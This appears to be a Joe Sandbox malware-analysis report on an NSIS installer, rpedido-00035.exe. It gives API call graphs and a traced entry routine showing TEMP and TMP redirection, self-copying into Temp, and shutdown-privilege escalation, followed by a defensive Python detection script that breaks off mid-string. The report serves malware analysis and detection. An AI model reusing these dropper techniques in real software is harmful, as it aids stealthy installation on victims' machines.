API calls 5746->5751 5753 4043ac 8 API calls 5747->5753 5752 404345 18 API calls 5749->5752 5750 4049d0 5755 405d89 18 API calls 5750->5755 5756 404930 SHBrowseForFolderW 5751->5756 5757 4048a1 5752->5757 5758 404b63 5753->5758 5759 40487b 5754->5759 5760 4049d6 5755->5760 5756->5744 5761 404948 CoTaskMemFree 5756->5761 5762 404345 18 API calls 5757->5762 5759->5749 5763 405c81 3 API calls 5759->5763 5801 4063b0 lstrcpynW 5760->5801 5764 405c81 3 API calls 5761->5764 5765 4048af 5762->5765 5763->5749 5766 404955 5764->5766 5799 40437a SendMessageW 5765->5799 5769 40498c SetDlgItemTextW 5766->5769 5774 4063d2 17 API calls 5766->5774 5769->5744 5770 4048b5 5772 40678a 5 API calls 5770->5772 5771 4049ed 5773 40678a 5 API calls 5771->5773 5772->5746 5781 4049f4 5773->5781 5775 404974 lstrcmpiW 5774->5775 5775->5769 5778 404985 lstrcatW 5775->5778 5776 404a35 5802 4063b0 lstrcpynW 5776->5802 5778->5769 5779 404a3c 5780 405d2c 4 API calls 5779->5780 5782 404a42 GetDiskFreeSpaceW 5780->5782 5781->5776 5784 405ccd 2 API calls 5781->5784 5786 404a8d 5781->5786 5785 404a66 MulDiv 5782->5785 5782->5786 5784->5781 5785->5786 5787 404afe 5786->5787 5788 404c99 20 API calls 5786->5788 5789 404b21 5787->5789 5790 40140b 2 API calls 5787->5790 5791 404aeb 5788->5791 5803 404367 EnableWindow 5789->5803 5790->5789 5793 404b00 SetDlgItemTextW 5791->5793 5794 404af0 5791->5794 5793->5787 5796 404bd0 20 API calls 5794->5796 5795 404b3d 5795->5747 5797 40476d SendMessageW 5795->5797 5796->5787 5797->5747 5798->5742 5799->5770 5800->5750 5801->5771 5802->5779 5803->5795 5804 10001058 5806 10001074 5804->5806 5805 100010dd 5806->5805 5807 10001516 GlobalFree 5806->5807 5808 10001092 5806->5808 5807->5808 5809 10001516 GlobalFree 5808->5809 5810 100010a2 5809->5810 5811 100010b2 5810->5811 5812 100010a9 GlobalSize 5810->5812 5813 100010b6 GlobalAlloc 5811->5813 5814 100010c7 5811->5814 5812->5811 5815 1000153d 3 API calls 5813->5815 5816 100010d2 GlobalFree 5814->5816 5815->5814 5816->5805 
5817 401c19 5818 402c15 17 API calls 5817->5818 5819 401c20 5818->5819 5820 402c15 17 API calls 5819->5820 5821 401c2d 5820->5821 5822 402c37 17 API calls 5821->5822 5824 401c42 5821->5824 5822->5824 5823 401c52 5826 401ca9 5823->5826 5827 401c5d 5823->5827 5824->5823 5825 402c37 17 API calls 5824->5825 5825->5823 5828 402c37 17 API calls 5826->5828 5829 402c15 17 API calls 5827->5829 5830 401cae 5828->5830 5831 401c62 5829->5831 5832 402c37 17 API calls 5830->5832 5833 402c15 17 API calls 5831->5833 5834 401cb7 FindWindowExW 5832->5834 5835 401c6e 5833->5835 5838 401cd9 5834->5838 5836 401c99 SendMessageW 5835->5836 5837 401c7b SendMessageTimeoutW 5835->5837 5836->5838 5837->5838 5839 402a9a SendMessageW 5840 402ab4 InvalidateRect 5839->5840 5841 402abf 5839->5841 5840->5841 5842 40281b 5843 402821 5842->5843 5844 402829 FindClose 5843->5844 5845 402abf 5843->5845 5844->5845 5846 40149e 5847 4022f1 5846->5847 5848 4014ac PostQuitMessage 5846->5848 5848->5847 5856 100010e1 5859 10001111 5856->5859 5857 100011d8 GlobalFree 5858 100012ba 2 API calls 5858->5859 5859->5857 5859->5858 5860 100011d3 5859->5860 5861 10001272 2 API calls 5859->5861 5862 10001164 GlobalAlloc 5859->5862 5863 100011f8 GlobalFree 5859->5863 5864 100011c4 GlobalFree 5859->5864 5865 100012e1 lstrcpyW 5859->5865 5860->5857 5861->5864 5862->5859 5863->5859 5864->5859 5865->5859 5866 4029a2 5867 402c15 17 API calls 5866->5867 5868 4029a8 5867->5868 5869 4029e8 5868->5869 5870 4029cf 5868->5870 5877 402885 5868->5877 5872 402a02 5869->5872 5873 4029f2 5869->5873 5871 4029d4 5870->5871 5879 4029e5 5870->5879 5880 4063b0 lstrcpynW 5871->5880 5875 4063d2 17 API calls 5872->5875 5874 402c15 17 API calls 5873->5874 5874->5879 5875->5879 5879->5877 5881 4062f7 wsprintfW 5879->5881 5880->5877 5881->5877 4386 4015a3 4387 402c37 17 API calls 4386->4387 4388 4015aa SetFileAttributesW 4387->4388 4389 4015bc 4388->4389 5882 4028a7 5883 402c37 17 API calls 5882->5883 5884 4028b5 5883->5884 5885 4028cb 5884->5885 
5886 402c37 17 API calls 5884->5886 5887 405e7d 2 API calls 5885->5887 5886->5885 5888 4028d1 5887->5888 5910 405ea2 GetFileAttributesW CreateFileW 5888->5910 5890 4028de 5891 402981 5890->5891 5892 4028ea GlobalAlloc 5890->5892 5895 402989 DeleteFileW 5891->5895 5896 40299c 5891->5896 5893 402903 5892->5893 5894 402978 CloseHandle 5892->5894 5911 403441 SetFilePointer 5893->5911 5894->5891 5895->5896 5898 402909 5899 40342b ReadFile 5898->5899 5900 402912 GlobalAlloc 5899->5900 5901 402922 5900->5901 5902 402956 5900->5902 5904 4031ba 44 API calls 5901->5904 5903 405f54 WriteFile 5902->5903 5905 402962 GlobalFree 5903->5905 5909 40292f 5904->5909 5906 4031ba 44 API calls 5905->5906 5907 402975 5906->5907 5907->5894 5908 40294d GlobalFree 5908->5902 5909->5908 5910->5890 5911->5898 4780 40202c 4781 4020f0 4780->4781 4782 40203e 4780->4782 4784 401423 24 API calls 4781->4784 4783 402c37 17 API calls 4782->4783 4785 402045 4783->4785 4791 40224a 4784->4791 4786 402c37 17 API calls 4785->4786 4787 40204e 4786->4787 4788 402064 LoadLibraryExW 4787->4788 4789 402056 GetModuleHandleW 4787->4789 4788->4781 4790 402075 4788->4790 4789->4788 4789->4790 4803 4067f9 WideCharToMultiByte 4790->4803 4794 402086 4797 4020a5 4794->4797 4798 40208e 4794->4798 4795 4020bf 4796 405414 24 API calls 4795->4796 4799 402096 4796->4799 4806 10001759 4797->4806 4800 401423 24 API calls 4798->4800 4799->4791 4801 4020e2 FreeLibrary 4799->4801 4800->4799 4801->4791 4804 406823 GetProcAddress 4803->4804 4805 402080 4803->4805 4804->4805 4805->4794 4805->4795 4807 10001789 4806->4807 4848 10001b18 4807->4848 4809 10001790 4810 100018a6 4809->4810 4811 100017a1 4809->4811 4812 100017a8 4809->4812 4810->4799 4896 10002286 4811->4896 4880 100022d0 4812->4880 4817 1000180c 4823 10001812 4817->4823 4824 1000184e 4817->4824 4818 100017ee 4909 100024a4 4818->4909 4819 100017d7 4833 100017cd 4819->4833 4906 10002b57 4819->4906 4820 100017be 4822 100017c4 4820->4822 4828 100017cf 4820->4828 4822->4833 
4890 1000289c 4822->4890 4830 100015b4 3 API calls 4823->4830 4826 100024a4 10 API calls 4824->4826 4831 10001840 4826->4831 4827 100017f4 4920 100015b4 4827->4920 4900 10002640 4828->4900 4835 10001828 4830->4835 4847 10001895 4831->4847 4931 10002467 4831->4931 4833->4817 4833->4818 4838 100024a4 10 API calls 4835->4838 4837 100017d5 4837->4833 4838->4831 4840 1000189f GlobalFree 4840->4810 4844 10001881 4844->4847 4935 1000153d wsprintfW 4844->4935 4845 1000187a FreeLibrary 4845->4844 4847->4810 4847->4840 4938 1000121b GlobalAlloc 4848->4938 4850 10001b3c 4939 1000121b GlobalAlloc 4850->4939 4852 10001d7a GlobalFree GlobalFree GlobalFree 4853 10001d97 4852->4853 4859 10001de1 4852->4859 4855 10001dac 4853->4855 4856 100020ee 4853->4856 4853->4859 4854 10001b47 4854->4852 4857 10001c1d GlobalAlloc 4854->4857 4854->4859 4862 10001c68 lstrcpyW 4854->4862 4863 10001c86 GlobalFree 4854->4863 4865 10001c72 lstrcpyW 4854->4865 4870 10002048 4854->4870 4874 10001cc4 4854->4874 4875 10001f37 GlobalFree 4854->4875 4878 1000122c 2 API calls 4854->4878 4945 1000121b GlobalAlloc 4854->4945 4855->4859 4942 1000122c 4855->4942 4858 10002110 GetModuleHandleW 4856->4858 4856->4859 4857->4854 4860 10002121 LoadLibraryW 4858->4860 4861 10002136 4858->4861 4859->4809 4860->4859 4860->4861 4946 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4861->4946 4862->4865 4863->4854 4865->4854 4866 10002148 4867 10002188 4866->4867 4879 10002172 GetProcAddress 4866->4879 4867->4859 4868 10002195 lstrlenW 4867->4868 4947 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4868->4947 4870->4859 4873 10002090 lstrcpyW 4870->4873 4873->4859 4874->4854 4940 1000158f GlobalSize GlobalAlloc 4874->4940 4875->4854 4876 100021af 4876->4859 4878->4854 4879->4867 4887 100022e8 4880->4887 4881 1000122c GlobalAlloc lstrcpynW 4881->4887 4883 10002410 GlobalFree 4884 100017ae 4883->4884 4883->4887 4884->4819 4884->4820 4884->4833 
4885 100023ba GlobalAlloc CLSIDFromString 4885->4883 4886 1000238f GlobalAlloc WideCharToMultiByte 4886->4883 4887->4881 4887->4883 4887->4885 4887->4886 4889 100023d9 4887->4889 4949 100012ba 4887->4949 4889->4883 4953 100025d4 4889->4953 4892 100028ae 4890->4892 4891 10002953 VirtualAllocEx 4893 10002971 4891->4893 4892->4891 4894 10002a62 GetLastError 4893->4894 4895 10002a6d 4893->4895 4894->4895 4895->4833 4897 10002296 4896->4897 4898 100017a7 4896->4898 4897->4898 4899 100022a8 GlobalAlloc 4897->4899 4898->4812 4899->4897 4904 1000265c 4900->4904 4901 100026c0 4903 100026c5 GlobalSize 4901->4903 4905 100026cf 4901->4905 4902 100026ad GlobalAlloc 4902->4905 4903->4905 4904->4901 4904->4902 4905->4837 4908 10002b62 4906->4908 4907 10002ba2 GlobalFree 4908->4907 4956 1000121b GlobalAlloc 4909->4956 4911 10002506 MultiByteToWideChar 4916 100024ae 4911->4916 4912 1000252b StringFromGUID2 4912->4916 4913 1000253c lstrcpynW 4913->4916 4914 1000256c GlobalFree 4914->4916 4915 1000254f wsprintfW 4915->4916 4916->4911 4916->4912 4916->4913 4916->4914 4916->4915 4917 100025a7 GlobalFree 4916->4917 4918 10001272 2 API calls 4916->4918 4957 100012e1 4916->4957 4917->4827 4918->4916 4961 1000121b GlobalAlloc 4920->4961 4922 100015ba 4923 100015c7 lstrcpyW 4922->4923 4925 100015e1 4922->4925 4926 100015fb 4923->4926 4925->4926 4927 100015e6 wsprintfW 4925->4927 4928 10001272 4926->4928 4927->4926 4929 100012b5 GlobalFree 4928->4929 4930 1000127b GlobalAlloc lstrcpynW 4928->4930 4929->4831 4930->4929 4932 10002475 4931->4932 4934 10001861 4931->4934 4933 10002491 GlobalFree 4932->4933 4932->4934 4933->4932 4934->4844 4934->4845 4936 10001272 2 API calls 4935->4936 4937 1000155e 4936->4937 4937->4847 4938->4850 4939->4854 4941 100015ad 4940->4941 4941->4874 4948 1000121b GlobalAlloc 4942->4948 4944 1000123b lstrcpynW 4944->4859 4945->4854 4946->4866 4947->4876 4948->4944 4950 100012c1 4949->4950 4951 1000122c 2 API calls 4950->4951 4952 100012df 4951->4952 4952->4887 4954 
100025e2 VirtualAlloc 4953->4954 4955 10002638 4953->4955 4954->4955 4955->4889 4956->4916 4958 100012ea 4957->4958 4959 1000130c 4957->4959 4958->4959 4960 100012f0 lstrcpyW 4958->4960 4959->4916 4960->4959 4961->4922 5919 402a2f 5920 402c15 17 API calls 5919->5920 5921 402a35 5920->5921 5922 402a6c 5921->5922 5923 402885 5921->5923 5925 402a47 5921->5925 5922->5923 5924 4063d2 17 API calls 5922->5924 5924->5923 5925->5923 5927 4062f7 wsprintfW 5925->5927 5927->5923 5928 401a30 5929 402c37 17 API calls 5928->5929 5930 401a39 ExpandEnvironmentStringsW 5929->5930 5931 401a4d 5930->5931 5933 401a60 5930->5933 5932 401a52 lstrcmpW 5931->5932 5931->5933 5932->5933 5939 401db3 GetDC 5940 402c15 17 API calls 5939->5940 5941 401dc5 GetDeviceCaps MulDiv ReleaseDC 5940->5941 5942 402c15 17 API calls 5941->5942 5943 401df6 5942->5943 5944 4063d2 17 API calls 5943->5944 5945 401e33 CreateFontIndirectW 5944->5945 5946 40258c 5945->5946 5947 402835 5948 40283d 5947->5948 5949 402841 FindNextFileW 5948->5949 5950 402853 5948->5950 5949->5950 5951 4029e0 5950->5951 5953 4063b0 lstrcpynW 5950->5953 5953->5951 5954 401735 5955 402c37 17 API calls 5954->5955 5956 40173c SearchPathW 5955->5956 5957 4029e0 5956->5957 5958 401757 5956->5958 5958->5957 5960 4063b0 lstrcpynW 5958->5960 5960->5957 5961 10002a77 5962 10002a8f 5961->5962 5963 1000158f 2 API calls 5962->5963 5964 10002aaa 5963->5964 5965 4014b8 5966 4014be 5965->5966 5967 401389 2 API calls 5966->5967 5968 4014c6 5967->5968 5969 406aba 5973 40693e 5969->5973 5970 4072a9 5971 4069c8 GlobalAlloc 5971->5970 5971->5973 5972 4069bf GlobalFree 5972->5971 5973->5970 5973->5971 5973->5972 5974 406a36 GlobalFree 5973->5974 5975 406a3f GlobalAlloc 5973->5975 5974->5975 5975->5970 5975->5973

                                                          Control-flow Graph (entry block 00403489; node colouring legend: Executed / Not Executed)
                                                          control_flow_graph 0 403489-4034c6 SetErrorMode GetVersion 1 4034c8-4034d0 call 40678a 0->1 2 4034d9 0->2 1->2 8 4034d2 1->8 3 4034de-4034f2 call 40671a lstrlenA 2->3 9 4034f4-403510 call 40678a * 3 3->9 8->2 16 403521-403582 #17 OleInitialize SHGetFileInfoW call 4063b0 GetCommandLineW call 4063b0 GetModuleHandleW 9->16 17 403512-403518 9->17 24 403584-40358b 16->24 25 40358c-4035a6 call 405cae CharNextW 16->25 17->16 22 40351a 17->22 22->16 24->25 28 4035ac-4035b2 25->28 29 4036bd-4036d7 GetTempPathW call 403458 25->29 31 4035b4-4035b9 28->31 32 4035bb-4035bf 28->32 36 4036d9-4036f7 GetWindowsDirectoryW lstrcatW call 403458 29->36 37 40372f-403749 DeleteFileW call 402f14 29->37 31->31 31->32 34 4035c1-4035c5 32->34 35 4035c6-4035ca 32->35 34->35 38 4035d0-4035d6 35->38 39 403689-403696 call 405cae 35->39 36->37 54 4036f9-403729 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403458 36->54 57 4037fa-40380a call 4039cc OleUninitialize 37->57 58 40374f-403755 37->58 43 4035f1-40362a 38->43 44 4035d8-4035e0 38->44 55 403698-403699 39->55 56 40369a-4036a0 39->56 45 403647-403681 43->45 46 40362c-403631 43->46 50 4035e2-4035e5 44->50 51 4035e7 44->51 45->39 53 403683-403687 45->53 46->45 52 403633-40363b 46->52 50->43 50->51 51->43 60 403642 52->60 61 40363d-403640 52->61 53->39 62 4036a8-4036b6 call 4063b0 53->62 54->37 54->57 55->56 56->28 64 4036a6 56->64 74 403930-403936 57->74 75 403810-403820 call 405a12 ExitProcess 57->75 65 4037ea-4037f1 call 403abe 58->65 66 40375b-403766 call 405cae 58->66 60->45 61->45 61->60 69 4036bb 62->69 64->69 73 4037f6 65->73 77 4037b4-4037be 66->77 78 403768-40379d 66->78 69->29 73->57 80 4039b4-4039bc 74->80 81 403938-40394e GetCurrentProcess OpenProcessToken 74->81 85 4037c0-4037ce call 405d89 77->85 86 403826-40383a call 40597d lstrcatW 77->86 82 40379f-4037a3 78->82 83 4039c2-4039c6 ExitProcess 80->83 84 4039be 80->84 88 403950-40397e LookupPrivilegeValueW 
AdjustTokenPrivileges 81->88 89 403984-403992 call 40678a 81->89 90 4037a5-4037aa 82->90 91 4037ac-4037b0 82->91 84->83 85->57 99 4037d0-4037e6 call 4063b0 * 2 85->99 100 403847-403861 lstrcatW lstrcmpiW 86->100 101 40383c-403842 lstrcatW 86->101 88->89 102 4039a0-4039ab ExitWindowsEx 89->102 103 403994-40399e 89->103 90->91 95 4037b2 90->95 91->82 91->95 95->77 99->65 100->57 106 403863-403866 100->106 101->100 102->80 104 4039ad-4039af call 40140b 102->104 103->102 103->104 104->80 110 403868-40386d call 4058e3 106->110 111 40386f call 405960 106->111 115 403874-403882 SetCurrentDirectoryW 110->115 111->115 118 403884-40388a call 4063b0 115->118 119 40388f-4038b8 call 4063b0 115->119 118->119 123 4038bd-4038d9 call 4063d2 DeleteFileW 119->123 126 40391a-403922 123->126 127 4038db-4038eb CopyFileW 123->127 126->123 128 403924-40392b call 406176 126->128 127->126 129 4038ed-40390d call 406176 call 4063d2 call 405995 127->129 128->57 129->126 138 40390f-403916 CloseHandle 129->138 138->126
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 004034AC
                                                          • GetVersion.KERNEL32 ref: 004034B2
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
                                                          • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
                                                          • OleInitialize.OLE32(00000000), ref: 00403529
                                                          • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
                                                          • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\rpedido-00035.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\rpedido-00035.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594
                                                            • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                            • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036EB
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403707
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734
                                                            • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                          • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004037FF
                                                          • ExitProcess.KERNEL32 ref: 00403820
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rpedido-00035.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403833
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rpedido-00035.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403842
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rpedido-00035.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rpedido-00035.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
                                                          • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038CF
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\rpedido-00035.exe,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038E3
                                                          • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
                                                          • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403946
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
                                                          • ExitProcess.KERNEL32 ref: 004039C6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                          • String ID: "C:\Users\user\Desktop\rpedido-00035.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins$C:\Users\user\Desktop$C:\Users\user\Desktop\rpedido-00035.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 2488574733-1693202547
                                                          • Opcode ID: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
                                                          • Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
                                                          • Opcode Fuzzy Hash: 0c5ed391fea6fa0d6bec001cb8bac7c1b86e8aed39806b07c52da4fce73069a4
                                                          • Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E
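The API listing for the entry routine at 00403489 above (SetEnvironmentVariableW on TEMP and TMP, the CopyFileW of the installer itself into a ~nsu…tmp path under Temp, and the OpenProcessToken / LookupPrivilegeValueW(SeShutdownPrivilege) / AdjustTokenPrivileges / ExitWindowsEx tail) and the DeleteFileW, lstrcatW("\*.*"), FindFirstFileW / FindNextFileW / FindClose walk in the routine at 00405ABE further down are the parts of this report a detection engineer would turn into checks. The Python below is an added example and is not part of the Joe Sandbox report, of the sandbox's tooling or of the sample: it parses bullet lines in the report's own "Name.MODULE(args), ref: address" shape (including the "Part of subcall function" prefix), tests the parsed call sequence for those three patterns, and decodes the ExitWindowsEx(00000002,80040002) arguments into their EWX_* and SHTDN_REASON_* names. The rule names and check functions are this example's own assumptions; the embedded sample lines are copied from the two listings on this page.

```python
"""Parse a Joe Sandbox 'APIs' listing and test the call sequence for a few behaviour patterns.
Added example, not part of the sandbox report or of the sample; input lines are copied from this page."""
import re
from dataclasses import dataclass

# One bullet per call, "• Name.MODULE(arg1,arg2,...), ref: 00403522"; callee calls carry "Part of subcall function X:".
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[#\w]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int                    # call-site address
    subcall_of: "int | None"    # address of the callee this call belongs to, if any


def parse_api_listing(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:               # section headers ("APIs", "Strings") and blank lines
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] is not None else ()
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def first(calls, name):
    return next((c for c in calls if c.name == name), None)


def in_order(calls, names) -> bool:
    # The listing is sorted by call-site address, so a subsequence match is a code-order match.
    it = iter(c.name for c in calls if c.subcall_of is None)
    return all(n in it for n in names)


def check_shutdown_capability(calls) -> bool:
    lookup = first(calls, "LookupPrivilegeValueW")
    return lookup is not None and "SeShutdownPrivilege" in lookup.args and in_order(
        calls, ["OpenProcessToken", "LookupPrivilegeValueW", "AdjustTokenPrivileges", "ExitWindowsEx"])


def check_temp_redirect_and_self_copy(calls) -> bool:
    env = {c.args[0] for c in calls if c.name == "SetEnvironmentVariableW" and c.args}
    copy = first(calls, "CopyFileW")
    return {"TEMP", "TMP"} <= env and copy is not None and copy.args[0].lower().endswith(".exe")


def check_directory_walk_delete(calls) -> bool:
    wildcard = any(c.name == "lstrcatW" and r"\*.*" in c.args for c in calls)
    return wildcard and first(calls, "DeleteFileW") is not None and in_order(
        calls, ["FindFirstFileW", "FindNextFileW", "FindClose"])


# ExitWindowsEx(uFlags, dwReason): Win32 EWX_* bits and SHTDN_REASON_* major/minor fields.
_EWX = [(0x01, "EWX_SHUTDOWN"), (0x02, "EWX_REBOOT"), (0x04, "EWX_FORCE"),
        (0x08, "EWX_POWEROFF"), (0x10, "EWX_FORCEIFHUNG"), (0x40, "EWX_RESTARTAPPS")]
_MAJOR = {0: "OTHER", 1: "HARDWARE", 2: "OPERATINGSYSTEM", 3: "SOFTWARE", 4: "APPLICATION", 5: "SYSTEM", 6: "POWER"}
_MINOR = {0: "OTHER", 1: "MAINTENANCE", 2: "INSTALLATION", 3: "UPGRADE", 4: "RECONFIG", 5: "HUNG", 6: "UNSTABLE"}


def decode_exit_windows_ex(uflags: int, reason: int) -> dict:
    major, minor = (reason >> 16) & 0xF, reason & 0xFFFF
    return {"flags": [n for bit, n in _EWX if uflags & bit] or ["EWX_LOGOFF"],
            "planned": bool(reason & 0x80000000),
            "major": "SHTDN_REASON_MAJOR_" + _MAJOR.get(major, f"0x{major:X}"),
            "minor": "SHTDN_REASON_MINOR_" + _MINOR.get(minor, f"0x{minor:X}")}


def triage(listing: str) -> dict:
    calls = parse_api_listing(listing)
    ewx = first(calls, "ExitWindowsEx")
    return {"calls": len(calls),
            "shutdown_capability": check_shutdown_capability(calls),
            "temp_redirect_and_self_copy": check_temp_redirect_and_self_copy(calls),
            "directory_walk_delete": check_directory_walk_delete(calls),
            "exit_windows_ex": decode_exit_windows_ex(int(ewx.args[0], 16), int(ewx.args[1], 16))
            if ewx is not None and len(ewx.args) >= 2 else None}


# Sample input: bullet lines copied verbatim from the listings for 00403489 and 00405ABE on this page.
MAIN_ROUTINE_LISTING = r"""
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
  • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
• CopyFileW.KERNEL32(C:\Users\user\Desktop\rpedido-00035.exe,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038E3
• OpenProcessToken.ADVAPI32(00000000), ref: 00403946
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
• AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
• ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
"""
DIRWALK_LISTING = r"""
• DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405AE7
• lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405B2F
• FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405B68
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
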